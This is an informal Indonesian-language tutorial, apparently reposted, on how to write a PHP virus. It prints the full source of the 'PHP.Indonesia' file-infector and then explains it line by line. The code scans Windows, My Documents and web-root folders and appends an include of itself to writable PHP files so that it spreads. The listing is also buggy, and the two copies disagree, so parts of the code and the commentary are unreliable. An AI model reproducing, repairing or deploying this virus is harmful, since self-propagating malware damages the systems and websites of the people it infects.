Membuat virus bisa dengan bahasa apa saja dan salah
satunya adalah dengan bahasa PHP. Pada artikel ini akan kita
lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan
nama I-Worm.PHP.Indonesia dibuat.
OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb
:
1. Artikel ini ditujukan buat menambah pengetahuan IT kita
saja
2. Saya dan penulis asli artikel ini tidak
bertanggungjawab
Jika ada lamer yang bertindak bodoh dengan menyebarkan
skrip ini
3. Judul asli artikel ini adalah "Simple technique how to
write PHP virus"
4. Skrip yang saya pake disini juga merupakan skrip virus
"PHP.Indonesia"
buatan sevenC dan udah terdeteksi Kaspersky nama
"I-Worm.PHP.Indonesia"
Ok...Kita mulai aja..!!
Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan
coba ngejelasin
baris demi baris arti codenya.
-------------------------------Code-------------------------------
<?
// #################################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ##################################################
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'indonesia.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "PHP.indonesia - ");
$fputs($new, "By sevenC / N0:7, ");
$fputs($new, "http://trax.to/sevenC, ");
$fputs($new, "sevenC_Zone@yahoo.com, ");
$fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
--------------------------------------eoc-----------------------
Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin
baris per baris
code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
yah...!! :) maklum
gw belum setaraf sama sevenC,hehehe... :P
-------------------------------------begin----------------------
<?
* Loe pasti tau kalo PHP musti dimulai make tanda ini --> <?
buat ngunjukin
browser kalo entu skrip PHP.
// ###############################################
// # PHP.Indonesia made for all Chicken looser ground the
world #
// # By sevenC / N0:7
#
// # http://sevenc.vze.com
#
// # sevenC_zone@yahoo.com
#
// ###############################################
* Pertama loe musti tau kalo komentar dalam PHP harus dimulai
dengan karakter -->> //
Jadi baris2 di atas engga akan di eksekusi karna cuman
komentar.
$jawa = "indonesia.php\n";
* Pemberian nama variabel harus dimulai dengan karakter $
* Menset variabel jawa sama dengan string "indonesia.php" dan
\n ntu ganti baris
* Setiap satu baris kalimat musti diakhiri dengan karakter
titik koma à ;
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
* Menset variabel sumatra sama dengan string "Wellcome to
Indonesian PHPlovers"
$kalimantan = $jawa . $sumatra;
* var kalimantan = var gabungan jawa dan var sumatra
echo $kalimantan;
* Menulis variabel kalimantan kedalam texttream
$all = opendir('C:\Windows\');
* var $all = membuka direktory windows
$all1 = opendir('C:\My Documents\');
* var $all1 = membuka direktory My Documents
$all2 = opendir('C:\InetPub\wwwRoot\');
* var $all2 = membuka directori wwwRoot
* karna saya rasa maksud sevenC membuka folder ini adalah
karna di PWS file-file PHP
* biasanya diletakan di direktori ini
$all3 = $all && $all1 && $all2
* $all3 = gabungan dari $all , $all1 dan $all3
while ($file = readdir($all3))
* Perulangan kita mulai ketika kita membaca isi direktori
{
* Inget dengan tanda ini..!!
$inf = true;
* menSet var $inf sebagai variabel boolean = true
$exe = false;
* menSet var $exe sebagai variabel boolean = false
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
* Lihatlah extensi2 file yang akan kita serang
(php,phtml,php3)
if ( is_file($file) && is_writeable($file) )
* Mencek atribut2 file,jika kita diijinkan menulis lalu
{
* Skali lagi jangan lupa tanda ini
$new = fopen($file, "r");
* menSet $new = membuka file baru dengan atribut read only
yang hanya bisa dibaca saja
$look = fread($new, filesize($file));
* menSet $look = membaca var $new dan ukuran dari file
$yes = strstr ($look, 'indonesia.php');
* menSet $yes = $look , indonesia.php
if (!$yes) $inf = false;
* Jika bukan var $yes maka var $inf bernilai salah
}
if ( ($inf=false) )
* jika var $inf = salah kemudian
{
$new = fopen($file, "a");
* menSet $new = membuka file ( variabel $file ) / file yang
diinfeksi
$fputs($new, "<!-- ");
* tulis string "<!--" kedalam file tsb ($new)
$fputs($new, "PHP.indonesia - ");
* tulis string "PHP.indonesia - " kedalam file tsb ($new)
$fputs($new, "By sevenC / N0:7, ");
* tulis string "By sevenC / N0:7, " kedalam file tsb ($new)
$fputs($new, "http://trax.to/sevenC, ");
* tulis string "http://trax.to/sevenC, " kedalam file tsb
($new)
$fputs($new, "sevenC_Zone@yahoo.com, ");
* tulis string "sevenC_Zone@yahoo.com, " kedalam file tsb
($new)
$fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
* tulis string tsb ($new) "SECTORS UNDERGROUND TEAM
(Indonesia)" kedalam file tsb ($new)
$fputs($new, "--->");
* tulis string "--->" kedalam file tsb ($new)
$fputs($new, "<?php ");
* Tulis seluruh kode virus ini kedalam file tsb
$fputs($new, "include(\"");
* tulis string "include(\" kedalam file tsb ($new)
$fputs($new, __FILE__);
* Tulis juga seluruh kode / skrip asli dari file tsb
$fputs($new, "\"); ");
* Tulis "\" kedalam file tsb
$fputs($new, "?>");
* Tulis "?>" kedalam file tsb
return;
* Ulangi langkah-langkah diatas
}
}
closedir($all3);
* menutup semua direktori yang aktif tadi ($all3)
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
* komentar om sevenC
?>
* Nutup skrip virus PHP ini
--------------------------------Selesai---------------------------
Ok... mudah-mudahan loe semua ngerti apa yang gw tulis
diatas,kalo kagak ? bodo amat :P
